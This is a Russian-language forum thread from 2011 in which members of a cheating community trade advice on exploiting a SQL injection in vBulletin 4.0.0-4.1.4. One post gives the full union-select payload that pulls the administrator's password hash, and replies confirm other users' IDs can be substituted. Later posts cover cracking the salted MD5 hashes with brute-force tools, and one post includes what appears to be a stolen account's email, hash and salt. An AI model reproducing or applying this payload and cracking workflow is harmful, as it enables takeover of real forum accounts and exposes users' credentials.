Регистрация Главная Сообщество
Сообщения за день Справка Регистрация
Навигация
Zhyk.org LIVE! Реклама на Zhyk.org Правила Форума Награды и достижения Доска "почета"

Обсуждение\вопросы Уязвимость vBulletin 4.0.0-4.1.4

-

Общение и обсуждение, архив Lineage 2

- Cобытия, информация, вопросы и ответы по Lineage 2

Ответ
 
Опции темы
Старый 26.09.2011, 10:24   #1
 Рыцарь
Аватар для 4ipolino
 
4ipolino троюродный дядя Чака Норриса4ipolino троюродный дядя Чака Норриса4ipolino троюродный дядя Чака Норриса4ipolino троюродный дядя Чака Норриса4ipolino троюродный дядя Чака Норриса4ipolino троюродный дядя Чака Норриса4ipolino троюродный дядя Чака Норриса4ipolino троюродный дядя Чака Норриса4ipolino троюродный дядя Чака Норриса4ipolino троюродный дядя Чака Норриса4ipolino троюродный дядя Чака Норриса
Регистрация: 19.02.2010
Сообщений: 340
Популярность: 9058
Сказал(а) спасибо: 301
Поблагодарили 696 раз(а) в 278 сообщениях
Отправить сообщение для 4ipolino с помощью ICQ Отправить сообщение для 4ipolino с помощью Telegram Отправить сообщение для 4ipolino с помощью Yahoo Отправить сообщение для 4ipolino с помощью Skype™
 
По умолчанию Обсуждение\вопросы Уязвимость vBulletin 4.0.0-4.1.4

Уязвимость http://zhyk.ru/forum/showthread.php?t=272998
все вопросы задавать тут
  Ответить с цитированием
Старый 26.09.2011, 11:07   #2
 Разведчик
Аватар для sunches
 
sunches на правильном путиsunches на правильном пути
Регистрация: 12.12.2009
Сообщений: 24
Популярность: 149
Сказал(а) спасибо: 143
Поблагодарили 19 раз(а) в 9 сообщениях
 
По умолчанию Re: Обсуждение\вопросы Уязвимость vBulletin 4.0.0-4.1.4

humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=p rocess&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*

то что выделенно красным можно поменять на id другого юзера?

и еще такой вопрос,что если стоит антиспам бот к примеру такой (Проверка вопроса системы антиспама "NoSpam!")


s=&securitytoken=guest&do=process&searchthreadid=& query=32erddd&titleonly=0&searchuser=&starteronly= 0&exactname=1&humanverify%5Binput%5D=ktag2s&humanv erify%5Bhash%5D=7ee31ad89911458254ed1d2db6a21588&nospamnumber=0&nospam=********.net&replyless=0&replylimit=0&searchdate=0&beforeafter =after&sortby=lastpost&order=descending&showposts= 0&tag=&forumchoice%5B%5D=0&childforums=1&dosearch= %CD%E0%F7%E0%F2%FC+%EF%EE%E8%F1%EA
________________
skype sunches123666

Последний раз редактировалось sunches; 26.09.2011 в 11:10.
  Ответить с цитированием
Старый 26.09.2011, 11:24   #3
 Капитан
Аватар для Excellent18rus
 
Excellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе цену
Регистрация: 07.04.2010
Сообщений: 293
Популярность: 4393
Сказал(а) спасибо: 133
Поблагодарили 334 раз(а) в 187 сообщениях
Отправить сообщение для Excellent18rus с помощью ICQ
 
По умолчанию Re: Обсуждение\вопросы Уязвимость vBulletin 4.0.0-4.1.4

ID можно менять

для запроса нужен только securitytoken вроде бы
  Ответить с цитированием
Пользователь сказал cпасибо:
sunches (26.09.2011)
Старый 27.09.2011, 17:05   #4
 Разведчик
Аватар для DiagensR
 
DiagensR никому не известный тип
Регистрация: 18.05.2011
Сообщений: 2
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: Обсуждение\вопросы Уязвимость vBulletin 4.0.0-4.1.4

А где тип хеша md5(md5($pass)$salt) расшифровать? Подскажите.
  Ответить с цитированием
Старый 27.09.2011, 17:13   #5
 Разведчик
Аватар для SyavaK
 
SyavaK скоро будет известенSyavaK скоро будет известенSyavaK скоро будет известенSyavaK скоро будет известен
Регистрация: 18.03.2010
Сообщений: 6
Популярность: 399
Сказал(а) спасибо: 1
Поблагодарили 188 раз(а) в 103 сообщениях
 
По умолчанию Re: Обсуждение\вопросы Уязвимость vBulletin 4.0.0-4.1.4

Цитата:
Сообщение от DiagensRПосмотреть сообщение
А где тип хеша md5(md5($pass)$salt) расшифровать? Подскажите.

в програме PasswordsPro или Extreme GPU Bruteforcer

2 вопроса
как узнать логин юзера 1 ? ведь логин и никнейм не одно и тоже
в соли присудствует такое
<
&
"
>
прочитал в инете
одни пишут что нужно удалить lt; amp; quot; gt;
другие пишут что нужно заменить их на символы какими они и являются & - &, " - "
так как делать правильно ?

Последний раз редактировалось SyavaK; 27.09.2011 в 17:17.
  Ответить с цитированием
Старый 27.09.2011, 17:42   #6
 Разведчик
Аватар для DiagensR
 
DiagensR никому не известный тип
Регистрация: 18.05.2011
Сообщений: 2
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: Обсуждение\вопросы Уязвимость vBulletin 4.0.0-4.1.4

" это двойная ковычка вроде. Я думаю не стоит удалять, проще заменить.
  Ответить с цитированием
Старый 27.09.2011, 17:46   #7
 Капитан
Аватар для Excellent18rus
 
Excellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе цену
Регистрация: 07.04.2010
Сообщений: 293
Популярность: 4393
Сказал(а) спасибо: 133
Поблагодарили 334 раз(а) в 187 сообщениях
Отправить сообщение для Excellent18rus с помощью ICQ
 
По умолчанию Re: Обсуждение\вопросы Уязвимость vBulletin 4.0.0-4.1.4

я удалял, потому что иначе соль больше 30 символов

Логин и никнейм в булке одно и тоже... вроде бы
это в ИПБ вроде логин и ник разные
  Ответить с цитированием
Старый 27.09.2011, 18:05   #8
 Разведчик
Аватар для SyavaK
 
SyavaK скоро будет известенSyavaK скоро будет известенSyavaK скоро будет известенSyavaK скоро будет известен
Регистрация: 18.03.2010
Сообщений: 6
Популярность: 399
Сказал(а) спасибо: 1
Поблагодарили 188 раз(а) в 103 сообщениях
 
По умолчанию Re: Обсуждение\вопросы Уязвимость vBulletin 4.0.0-4.1.4

Цитата:
Сообщение от Excellent18rusПосмотреть сообщение
я удалял, потому что иначе соль больше 30 символов

Логин и никнейм в булке одно и тоже... вроде бы :D
это в ИПБ вроде логин и ник разные

и после удаления удалось розшифровать пароль ?
  Ответить с цитированием
Старый 27.09.2011, 18:33   #9
 Разведчик
Аватар для DiagensR
 
DiagensR никому не известный тип
Регистрация: 18.05.2011
Сообщений: 2
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: Обсуждение\вопросы Уязвимость vBulletin 4.0.0-4.1.4

Ребят, еще вопрос, сколько по времени Passwords Pro расшифровывает это дело? У меня показывает что около двух дней будет копать....
  Ответить с цитированием
Старый 27.09.2011, 19:59   #10
 Разведчик
Аватар для SyavaK
 
SyavaK скоро будет известенSyavaK скоро будет известенSyavaK скоро будет известенSyavaK скоро будет известен
Регистрация: 18.03.2010
Сообщений: 6
Популярность: 399
Сказал(а) спасибо: 1
Поблагодарили 188 раз(а) в 103 сообщениях
 
По умолчанию Re: Обсуждение\вопросы Уязвимость vBulletin 4.0.0-4.1.4

Цитата:
Сообщение от DiagensRПосмотреть сообщение
Ребят, еще вопрос, сколько по времени Passwords Pro расшифровывает это дело? У меня показывает что около двух дней будет копать....

зависит от способа дешифровки, словари , брут и тд и ещё от длины пароля
может занять и месяцы )

ещё вопрос в соли попадается знак двоеточие это норм ?
ато пасвордпро его не щитает за часть соли а за разделитель
  Ответить с цитированием
Старый 27.09.2011, 20:42   #11
 Разведчик
Аватар для DiagensR
 
DiagensR никому не известный тип
Регистрация: 18.05.2011
Сообщений: 2
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: Обсуждение\вопросы Уязвимость vBulletin 4.0.0-4.1.4

Можете кто нить дать нормальный словарь, а то я смотрю многие очень быстро расшифровывают кучу паролей сольных.
  Ответить с цитированием
Старый 27.09.2011, 21:26   #12
 Разведчик
Аватар для SyavaK
 
SyavaK скоро будет известенSyavaK скоро будет известенSyavaK скоро будет известенSyavaK скоро будет известен
Регистрация: 18.03.2010
Сообщений: 6
Популярность: 399
Сказал(а) спасибо: 1
Поблагодарили 188 раз(а) в 103 сообщениях
 
По умолчанию Re: Обсуждение\вопросы Уязвимость vBulletin 4.0.0-4.1.4

Цитата:
Сообщение от Excellent18rusПосмотреть сообщение
Логин и никнейм в булке одно и тоже... вроде бы :D
это в ИПБ вроде логин и ник разные

токшо достал хеш и розшифровал его
присмотрелся к юзеру 1 а у него ник на русском ))
думаеш и логин тоже ? ))
  Ответить с цитированием
Старый 28.09.2011, 00:22   #13
 Капитан
Аватар для Excellent18rus
 
Excellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе цену
Регистрация: 07.04.2010
Сообщений: 293
Популярность: 4393
Сказал(а) спасибо: 133
Поблагодарили 334 раз(а) в 187 сообщениях
Отправить сообщение для Excellent18rus с помощью ICQ
 
По умолчанию Re: Обсуждение\вопросы Уязвимость vBulletin 4.0.0-4.1.4

не знаю даже
может и на русском логин)

да расшифровывал после убирания amp; итд

чтобы не показывало : как разделитель
загружай из буфера в виде акк:хеш:соль и все
  Ответить с цитированием
Старый 28.09.2011, 01:19   #14
 Разведчик
Аватар для SyavaK
 
SyavaK скоро будет известенSyavaK скоро будет известенSyavaK скоро будет известенSyavaK скоро будет известен
Регистрация: 18.03.2010
Сообщений: 6
Популярность: 399
Сказал(а) спасибо: 1
Поблагодарили 188 раз(а) в 103 сообщениях
 
По умолчанию Re: Обсуждение\вопросы Уязвимость vBulletin 4.0.0-4.1.4

Цитата:
Сообщение от Excellent18rusПосмотреть сообщение
чтобы не показывало : как разделитель
загружай из буфера в виде акк:хеш:соль и все

так и загружаю
[email protected]:f5de53adcccdb58f51dd58e7972890d4:T9LW6)e:L&&5tQ?~ (gbcyKES_lS`EE
в пасворд про
[email protected]:f5de53adcccdb58f51dd58e7972890d4:T9LW6)e
  Ответить с цитированием
Старый 28.09.2011, 08:40   #15
 Разведчик
Аватар для 3a4eT
 
3a4eT скоро будет известен3a4eT скоро будет известен3a4eT скоро будет известен3a4eT скоро будет известен
Регистрация: 26.10.2009
Сообщений: 25
Популярность: 336
Сказал(а) спасибо: 10
Поблагодарили 12 раз(а) в 5 сообщениях
 
По умолчанию Re: Обсуждение\вопросы Уязвимость vBulletin 4.0.0-4.1.4

Цитата:
Сообщение от SyavaKПосмотреть сообщение
так и загружаю
[email protected]:f5de53adcccdb58f51dd58e7972890d4:T9LW6)e:L&&5tQ?~ (gbcyKES_lS`EE
в пасворд про
[email protected]:f5de53adcccdb58f51dd58e7972890d4:T9LW6)e

в ручную добавляй
  Ответить с цитированием
Ответ


Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Уязвимость] vBulletin 4.0.0-4.1.4 Excellent18rus Базы серверов и брут 0 25.09.2011 19:08
помогите с vbulletin FunFtp Школа Читера 3 06.08.2011 11:58
[Уязвимость] vbulletin 3.8.6 -=Angel=- Базы серверов и брут 10 28.03.2011 15:32
[Помогите!] VBulletin lawliet94 Вопросы и ответы, обсуждения 6 03.08.2010 16:49

Заявление об ответственности / Список мошенников

Часовой пояс GMT +4, время: 01:08.

Пишите нам: [email protected]
Copyright © 2024 vBulletin Solutions, Inc.
Translate: zCarot. Webdesign by DevArt (Fox)
G-gaMe! Team production | Since 2008
Hosted by GShost.net